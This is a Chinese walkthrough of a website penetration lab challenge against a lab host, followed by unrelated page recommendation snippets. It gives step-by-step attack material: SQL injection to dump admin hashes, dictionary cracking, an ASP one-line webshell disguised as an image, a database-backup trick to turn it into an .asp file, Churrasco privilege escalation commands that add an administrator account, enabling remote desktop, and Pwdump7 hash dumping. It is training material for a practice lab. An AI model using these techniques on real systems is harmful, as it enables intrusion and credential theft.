02-在線挑戰(zhàn)詳細攻略-《網(wǎng)站綜合滲透實驗》

作者:獨狼1927
來源:02-在線挑戰(zhàn)詳細攻略-《網(wǎng)站綜合滲透實驗》

系列文章:
01-在線挑戰(zhàn)詳細攻略-《我很簡單春弥,請不要欺負我》
03-在線挑戰(zhàn)詳細攻略-《又見DZ,我能拿你怎么辦》
04-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽:Reinstall真題》
05-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽:框架漏洞真題》

<h1>Step 0</h1>
實驗環(huán)境
操作機:Windows XP [172.16.11.2]
目標網(wǎng)址:www.test.com [172.16.12.2]
ps:www.test.com www.test.ichunqiu都是可以的

實驗工具:
中國菜刀 ipscan MD5Crack2
Domain3.6 NTscan字典 saminside
SuperScan30 X-Scan-v3.3
亦思想社會工程學字典生成器
本實驗要求獲取www.test.com網(wǎng)站的服務器權(quán)限苞俘。
ps:圖片可單擊放大觀看。

<h1>Step 1</h1>
從題目要求可以看出龄章,這個實驗明顯是要突出社會工程學吃谣,所以搜集信息就是必須的了乞封,盡可能的搜集!
打開瀏覽器基协,進入網(wǎng)站首頁歌亲,眼尖的童鞋會發(fā)現(xiàn)菜單最右邊寫著 [攝影論壇],果斷進入論壇轉(zhuǎn)轉(zhuǎn)澜驮;

進入論壇后陷揪,尋找與linhai有關(guān)的信息,發(fā)現(xiàn)有他發(fā)表的文章杂穷,點擊斑竹名稱 [linhai]悍缠;
額~ 沒有登錄還不能查看,那就果斷注冊吧耐量!點擊左側(cè)的[注冊] 菜單進入注冊頁面飞蚓,不要點上邊的注冊,進不去廊蜒;
點擊頁面下方的 [我同意] 進行下一步趴拧;(不同意不行啊^_^)
把表單中帶星星的都填上,最重要的是記住用戶名和密碼山叮,別剛注冊完就忘了~ (蕓蕓眾生中這樣的事情經(jīng)常發(fā)生)
填完點擊 [申請] 進行提交著榴;注冊完有了自己的賬號后,你就可以看到linhai的信息了屁倔,用戶名就不用說了脑又,問題里已經(jīng)給了;

注意簽名欄:生于唐山大地震锐借!中國人應該都知道唐山大地震是哪一年發(fā)生的吧~

Paste_Image.png

Linhai的出生年份已經(jīng)搞定问麸,回到秋潮視覺工作室首頁,頁面底部有l(wèi)inhai的電子郵箱钞翔,0812很有可能就是linhai的生日严卖;還有他的QQ號:1957692;
綜上所述布轿,我們目前獲得的信息包括:
用戶名:Linhai
出生日期: 1976年08月12日
Email:linhai0812@21cn.com
QQ:1957692
順帶著發(fā)現(xiàn)了后臺入口…

點擊 [管理入口] 就可以進入后臺登錄頁面妄田;
Paste_Image.png

當然絕大多數(shù)后臺是不會直接爆出來的,得用工具驮捍;
目錄掃描
工具:御劍 路徑:C:\Tools\目錄掃描
打開御劍,在域名中輸入http://www.test.com脚曾,開始掃描

在目錄列表中查找后臺东且,發(fā)現(xiàn)存在/admin/login.asp
回到后臺登錄頁面,當然用戶名和密碼都不知道本讥,利用我們之前獲得的社工信息珊泳,加上注入鲁冯,進一步獲取用戶名和密碼。

<h1>Step 2</h1>

工具:旁注WEB綜合檢測程序Ver3.6修正版
路徑:C:\Tools\注入工具\Domain3.6\Domain3.6.exe

打開工具色查,依次點擊 [SQL注入] -->[批量掃描注入點] --> [添加網(wǎng)址] --> [批量分析注入點]薯演;
出現(xiàn)下面這個對話框說明已經(jīng)檢測完畢;
點擊OK進行下一步秧了;
注入點分析完畢后跨扮,會在下方列表中顯示可注入的地址,選擇其中一個地址验毡,右鍵選擇[檢測注入]衡创;
檢測完畢后,顯示可以注入晶通,并列出了數(shù)據(jù)庫類型:Access數(shù)據(jù)庫璃氢;
下面開始逐步 [猜解表名] -->[猜解列名]--> [猜解內(nèi)容]; 點擊 [猜解表名] 后狮辽,在數(shù)據(jù)庫列表中會顯示3個表一也,分別是admin、news和config喉脖;
選擇admin表椰苟,點擊 [猜解列名],成功猜解出三個列名id动看、admin和password尊剔;
勾選admin和password,點擊 [猜解內(nèi)容]菱皆,右側(cè)列表中成功顯示用戶名linhai须误,密碼d7e15730ef9708c0
下一步,打開字典生成器仇轻,生成字典京痢; 工具:亦思想社會工程學字典生成器 路徑:C:\Tools\社會輔助\亦思想社會工程學字典生成器\亦思想社會工程學字典生成器.exe
打開社工工具亦思想社會工程學字典生成器,輸入之前獲得的社工信息篷店,生成字典祭椰;
點擊 [生成字典] 之后,會在工具同一目錄下生成mypass.txt疲陕,這個就是我們需要的字典方淤;
打開MD5破解工具,準備破解蹄殃; 工具:MD5Crack2.exe 路徑: C:\Tools\破解工具\MD5\ MD5Crack2.exe
打開破解工具携茂,輸入我們獲得的密碼密文,選擇 [使用字典]诅岩;
點擊 [瀏覽] 按鈕讳苦,選擇剛剛生成的社工字典mypass.txt带膜;注意,如果找不見文件鸳谜,在文件類型中選擇全部文件膝藕;
點擊 [開始] 按鈕進行暴力破解,運氣很好咐扭,秒破芭挽!
也可以直接上網(wǎng)進行破解,打開[http://www.somd5.com](http://www.somd5.com/)草描,輸入讓你無語的MD5:d7e15730ef9708c0览绿,因為有人提交過,也是秒破穗慕;
成功找到明文密碼:linhai19760812 下一步:登錄后臺饿敲,上傳木馬,GETSHELL逛绵;

<h1>Setp3</h1>
打開后臺登錄頁面怀各,輸入用戶名linhai,密碼linhai19760812术浪,輸入驗證碼瓢对,點擊 [登陸] 按鈕登錄后臺;

成功進入后臺
點擊 [設置管理] --> [系統(tǒng)變量設置]胰苏,發(fā)現(xiàn)系統(tǒng)設置中有上傳圖片的地方硕蛹,下一步,構(gòu)造圖片木馬硕并;

在桌面上新建一個文本文件法焰,在里面寫入一句話木馬
<code><%Eval Request("ichunqiu")%></code>
后面隨便輸入一些內(nèi)容,純粹是為了增加圖片體積倔毙,但要注意埃仪,幾十Kb足矣,體積太大太小都不行陕赃;

然后將文件重命名為jpg格式文件卵蛉;
打開后臺頁面,點擊 [上傳圖片]么库,把剛才構(gòu)造的圖片傳上去傻丝;
然后點擊 [生成代碼];
代碼生成后诉儒,復制圖片路徑桑滩![很重要]
關(guān)鍵步驟到了!點擊左側(cè)菜單 [數(shù)據(jù)管理]-->[備份/恢復數(shù)據(jù)庫],把 [數(shù)據(jù)庫路徑] 修改為剛才復制的圖片路徑运准,[備份的數(shù)據(jù)庫路徑] 修改為后綴名為asp的文件,文件名自己取缭受,記住就行胁澳,然后點擊備份;[ 特別注意:兩個路徑的最前面都有斜杠 ]
備份成功米者!
Paste_Image.png

打開 [中國菜刀] 連接一句話木馬韭畸;
工具:中國菜刀 路徑:C:\Tools\webshell\中國菜刀\chopper.exe


Paste_Image.png
打開菜刀,右鍵空白處蔓搞,選擇 [添加]胰丁;
在地址欄中輸入剛才備份數(shù)據(jù)庫的路徑,填寫連接密碼 [密碼在一句話里]喂分,點擊 [添加]锦庸;
添加成功后會新增一條記錄;
雙擊這個URL蒲祈,成功進入甘萧!那個test.asp就是臥底!

下一步梆掸,添加賬戶-->開啟3389-->遠程桌面連接-->獲取管理員賬戶密碼扬卷;

<h1>Step 4</h1>
進入C:\RECYCLER目錄,準備上傳提權(quán)工具酸钦;

Paste_Image.png

提權(quán)工具包括Churrasco.exe怪得,3389,cmd卑硫,路徑:C:\Tools\提權(quán)工具\windows

Paste_Image.png

Churrasco.exe 中文名:巴西烤肉徒恋!
Churrasco.exe是Windows2003系統(tǒng)下的一個本地提權(quán)漏洞,通過此工具可以以SYSTEM權(quán)限執(zhí)行命令拔恰,從而可以達到添加用戶的目的因谎。
補丁名:KB956572 MS09-012
使用方法:
<code>Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"</code>
兩行命令的意思分別是:
netuser hacker 123 /add -->添加一個用戶名為hacker、密碼為123的賬戶颜懊;
netlocalgroup administrators hacker /add -->將賬戶hacker添加到管理員組财岔;
開始上傳工具,選中這三個文件河爹,用鼠標直接拖到中國菜刀中匠璧,即可完成上傳;

Paste_Image.png

下一步咸这,執(zhí)行提權(quán)操作夷恍;右鍵cmd.exe,選擇 [虛擬終端]

Paste_Image.png

成功進入媳维,將目錄切換到C:\RECYCLER

Paste_Image.png

用Churrasco.exe執(zhí)行cmd命令酿雪,添加賬戶遏暴;
<code>Churrasco "net user hacker 123 /add"</code>

Paste_Image.png

賬戶添加成功,繼續(xù)下一步指黎,將新增的賬戶添加到管理員組朋凉;
<code>Churrasco "net localgroup administrators hacker /add"</code>

Paste_Image.png

添加成功,下一步醋安,開啟3389杂彭;
<code>Churrasco 3389</code>

Paste_Image.png

如果出現(xiàn)如上圖中的命令,說明執(zhí)行成功了吓揪,不成功就多執(zhí)行幾次命令亲怠,下一步,連接目標機柠辞;
[開始]-->[運行]-->mstsc

Paste_Image.png

如果找不見目標IP地址团秽,請點擊右上角 [場景拓撲圖] 進行查看:

Paste_Image.png

輸入目標IP地址:172.16.12.2,開始連接钾腺,繼續(xù)輸入用戶名hacker和密碼123徙垫,進入系統(tǒng);

Paste_Image.png
Paste_Image.png

3389連接成功放棒!下一步姻报,獲取系統(tǒng)管理員密碼,準確的說是獲取系統(tǒng)管理員密碼的hash间螟,上傳密碼獲取工具 [中國菜刀]吴旋;
工具很多,這里我們使用Pwdump7厢破;

Paste_Image.png

工具:Pwdump7 路徑: C:\Tools\提權(quán)工具\hash\Pwdump7荣瑟;[ 注意,一定要將libeay32.dll一并上傳摩泪,否則執(zhí)行不了 ]

Paste_Image.png

上傳成功笆焰!

Paste_Image.png

進入目標機,將CMD目錄切換到RECYCLER见坑,運行一條命令:
<code>Pwdump7 > hash.txt</code>

Paste_Image.png

運行成功后嚷掠,會在同一目錄下生成一個文本文件hash.txt;

Paste_Image.png

打開hash.txt荞驴,成功獲取到administrator的hash:
3C8D6C158F6FB3D1FDCFC2AFB2D1BE34:594B9CD2577A5AC2BE0CA522D5EC6ACE

Paste_Image.png

暫時切換出實驗環(huán)境不皆,在你的電腦上打開瀏覽器輸入
http://www.objectif-securite.ch/en/ophcrack.php,在頁面的相應位置輸入hash熊楼,然后GO
ps:如果打不開就翻墻霹娄,或者用其他類似功能的網(wǎng)站也可以,這樣的站很多;

Paste_Image.png

最終輸出結(jié)果:

Paste_Image.png

<h1>Step 5</h1>
數(shù)據(jù)庫sa密碼在哪找犬耻?
WEB應用與數(shù)據(jù)庫之間會有一個配置文件踩晶,用來保存數(shù)據(jù)庫連接信息,包括數(shù)據(jù)庫驅(qū)動香追、數(shù)據(jù)庫名合瓢、用戶名、密碼等信息透典,找到這個文件就找到了密碼
文件名:conn_old.asp
路徑: C:\Inetpub\wwwroot\conn_old.asp

Paste_Image.png

打開文件即可見到Password;

Paste_Image.png

<h1>Step 6</h1>
Linhai論壇登錄密碼在哪里顿苇?
進入C:\Inetput\wwwroot\bbs\Data
發(fā)現(xiàn)有l(wèi)db文件峭咒,一般情況下肯定有mdb文件,看體積應該是dtxy.asp這個文件纪岁;

Paste_Image.png

把這個文件通過菜刀下載到本地凑队,用Domain3.6或其他數(shù)據(jù)庫瀏覽器工具查詢即可;

Paste_Image.png

把dtxy.asp修改為數(shù)據(jù)庫文件dtxy.mdb幔翰;

Paste_Image.png

打開Domain3.6漩氨,點擊 [數(shù)據(jù)庫管理]-->[文件]-->[打開數(shù)據(jù)庫],找到文件dtxy.mdb并打開遗增;

Paste_Image.png

找到表LeadBBS_User叫惊,第三條記錄就是linhai,密碼hash:e10adc3949ba59abbe56e057f20f883e

Paste_Image.png

暫時撤出實驗環(huán)境做修,用你本機的瀏覽器打開http://www.cmd5.com霍狰,輸入密文,點擊破解~

Paste_Image.png

本次實驗到此結(jié)束饰及,希望對大家有所幫助蔗坯,有不足之處請多多指正!
下一講:《又見DZ燎含,我能拿你怎么辦》

ps:部分知識點的內(nèi)容轉(zhuǎn)自網(wǎng)絡宾濒;路漫漫其修遠兮,感謝一路上黑友們的幫助@lonnyboy屏箍;
Dareand the world always yields.

--END--
本文來自:i春秋社區(qū)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末绘梦,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子铣除,更是在濱河造成了極大的恐慌谚咬,老刑警劉巖,帶你破解...
    沈念sama閱讀 212,542評論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件尚粘,死亡現(xiàn)場離奇詭異择卦,居然都是意外死亡,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,596評論 3 385
  • 文/潘曉璐 我一進店門秉继,熙熙樓的掌柜王于貴愁眉苦臉地迎上來祈噪,“玉大人,你說我怎么就攤上這事尚辑〖穑” “怎么了?”我有些...
    開封第一講書人閱讀 158,021評論 0 348
  • 文/不壞的土叔 我叫張陵杠茬,是天一觀的道長月褥。 經(jīng)常有香客問我,道長瓢喉,這世上最難降的妖魔是什么宁赤? 我笑而不...
    開封第一講書人閱讀 56,682評論 1 284
  • 正文 為了忘掉前任,我火速辦了婚禮栓票,結(jié)果婚禮上决左,老公的妹妹穿的比我還像新娘。我一直安慰自己走贪,他們只是感情好佛猛,可當我...
    茶點故事閱讀 65,792評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著坠狡,像睡著了一般继找。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上擦秽,一...
    開封第一講書人閱讀 49,985評論 1 291
  • 那天码荔,我揣著相機與錄音,去河邊找鬼感挥。 笑死缩搅,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的触幼。 我是一名探鬼主播硼瓣,決...
    沈念sama閱讀 39,107評論 3 410
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼置谦!你這毒婦竟也來了堂鲤?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,845評論 0 268
  • 序言:老撾萬榮一對情侶失蹤媒峡,失蹤者是張志新(化名)和其女友劉穎瘟栖,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體谅阿,經(jīng)...
    沈念sama閱讀 44,299評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡半哟,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,612評論 2 327
  • 正文 我和宋清朗相戀三年酬滤,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片寓涨。...
    茶點故事閱讀 38,747評論 1 341
  • 序言:一個原本活蹦亂跳的男人離奇死亡盯串,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出戒良,到底是詐尸還是另有隱情体捏,我是刑警寧澤,帶...
    沈念sama閱讀 34,441評論 4 333
  • 正文 年R本政府宣布糯崎,位于F島的核電站几缭,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏沃呢。R本人自食惡果不足惜奏司,卻給世界環(huán)境...
    茶點故事閱讀 40,072評論 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望樟插。 院中可真熱鬧,春花似錦竿刁、人聲如沸黄锤。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,828評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽鸵熟。三九已至,卻和暖如春负甸,著一層夾襖步出監(jiān)牢的瞬間流强,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,069評論 1 267
  • 我被黑心中介騙來泰國打工呻待, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留打月,地道東北人。 一個月前我還...
    沈念sama閱讀 46,545評論 2 362
  • 正文 我出身青樓蚕捉,卻偏偏與公主長得像奏篙,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子迫淹,可洞房花燭夜當晚...
    茶點故事閱讀 43,658評論 2 350

推薦閱讀更多精彩內(nèi)容

  • 本文來源: 01-在線挑戰(zhàn)詳細攻略-《我很簡單敛熬,請不要欺負我》 系列文章: 02-在線挑戰(zhàn)詳細攻略-《網(wǎng)站綜合滲透...
    i春秋論壇閱讀 3,481評論 0 6
  • win7 cmd管理員權(quán)限設置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,166評論 0 11
  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫.即命令提示符(CMD)肺稀,是在OS / 2 , Windows...
    青冥之上閱讀 2,388評論 0 24
  • 情不知所起一往而深应民,不知所終话原,愛一場你我都是彼此的過客夕吻。 在我的生命里,愛情是讓人疲累的稿静,愛一個人惶惶不可終日梭冠,喜...
    悠悠我思66666閱讀 253評論 0 1
  • 【幼兒說】原創(chuàng)控漠,轉(zhuǎn)載請標出處 有一位媽媽曾經(jīng)這樣問我渺尘,我的孩子明年馬上就要上小學扒秸,我該如何安排他的學習時間?我該讓...
    幼兒說閱讀 835評論 0 0